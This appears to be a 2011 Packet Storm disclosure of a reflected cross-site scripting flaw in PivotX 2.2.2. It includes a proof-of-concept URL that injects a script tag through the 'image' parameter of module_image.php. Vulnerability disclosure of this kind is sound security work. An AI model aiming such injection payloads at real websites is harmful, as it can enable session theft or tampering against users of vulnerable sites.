PivotX 2.2.2 Cross Site Scripting

2011-01-25T00:00:00
ID PACKETSTORM:97831
Type packetstorm
Reporter AutoSec Tools
Modified 2011-01-25T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................PivotX 2.2.2  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://pivotx.net/  
Release Date............1/23/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in PivotX 2.2.2 can be  
exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E  
`